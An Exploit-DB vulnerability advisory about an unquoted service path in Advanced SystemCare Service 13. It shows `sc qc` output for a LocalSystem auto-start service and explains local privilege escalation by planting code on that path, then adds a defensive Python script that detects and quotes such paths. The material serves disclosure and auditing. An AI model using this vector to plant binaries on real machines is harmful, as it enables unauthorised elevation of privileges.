Advanced System Care Service 13 – ‘AdvancedSystemCareService13’ Unquoted Service Path

  • Author: Jair Amezcua
    Date: 2020-11-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49049/
  • # Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
    # Author: Jair Amezcua
    # Date: 2020-11-10
    # Vendor Homepage: https://www.iobit.com
    # Software Link: https://www.iobit.com/es/advancedsystemcarepro.php
    # Version : 13.0.0.157
    # Tested on: Windows 10 64bit(EN)
    # CVE : N/A
    
    # 1. Description:
    # The 'AdvancedSystemCareService13' service in Advanced System Care Service 13 v13.0.0.157 has an unquoted service path.
    
    # PoC
    ===========
    
    C:\>sc qc AdvancedSystemCareService13
    [SC] QueryServiceConfig SUCCESS
    SERVICE_NAME: AdvancedSystemCareService13
    TYPE : 10 WIN32_OWN_PROCESS
    START_TYPE : 2 AUTO_START
    ERROR_CONTROL: 1 NORMAL
    BINARY_PATH_NAME : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
    LOAD_ORDER_GROUP : System Reserved
    TAG: 0
    DISPLAY_NAME : Advanced SystemCare Service 13
    DEPENDENCIES :
    SERVICE_START_NAME : LocalSystem
    
    
    
    # Exploit description:
    # A successful attempt would require the local user to be able to insert their code in the system root path 
    # undetected by the OS or other security applications where it could potentially be executed during 
    # application startup or reboot. If successful, the local user's code would execute with the elevated 
    # privileges of the application.
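
Added example (not part of the original advisory, and not vendor code): a Python audit helper that parses `sc qc` output like the listing above, flags an unquoted `BINARY_PATH_NAME` containing spaces, lists the shorter file names Windows resolves first so the write permissions of their parent folders can be reviewed, and builds the quoted value. The function names and the trimmed sample text are constructed for illustration, and the executable is assumed to end in `.exe`.

```python
import re

# Constructed sample: trimmed copy of the `sc qc` output shown in the advisory.
SC_QC_OUTPUT = r"""
SERVICE_NAME: AdvancedSystemCareService13
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
        SERVICE_START_NAME : LocalSystem
"""

def binary_path(sc_output):
    """Return the BINARY_PATH_NAME value from `sc qc` text, or None."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", sc_output, re.M)
    return m.group(1) if m else None

def split_image_path(path):
    """Split a command line into (executable, arguments) at the first '.exe'."""
    m = re.match(r"(?i)^(.*?\.exe)\b(.*)$", path)
    return (m.group(1), m.group(2)) if m else (path, "")

def is_unquoted_with_spaces(path):
    """True when the executable part contains a space and is not quoted."""
    if path.lstrip().startswith('"'):
        return False
    exe, _ = split_image_path(path)
    return " " in exe

def ambiguous_prefixes(path):
    """Shorter file names Windows tries first; every space is a split point."""
    exe, _ = split_image_path(path)
    return [exe[:i] + ".exe" for i, c in enumerate(exe) if c == " "]

def quoted_fix(path):
    """Return the command line with the executable wrapped in quotes."""
    exe, args = split_image_path(path)
    return f'"{exe}"{args}'

if __name__ == "__main__":
    p = binary_path(SC_QC_OUTPUT)
    if p and is_unquoted_with_spaces(p):
        print("UNQUOTED:", p)
        for c in ambiguous_prefixes(p):
            print("  review write ACLs for:", c)
        print("  corrected value:", quoted_fix(p))
```

The corrected value is what the service's `ImagePath` should contain; a service that already reports a quoted path is not flagged.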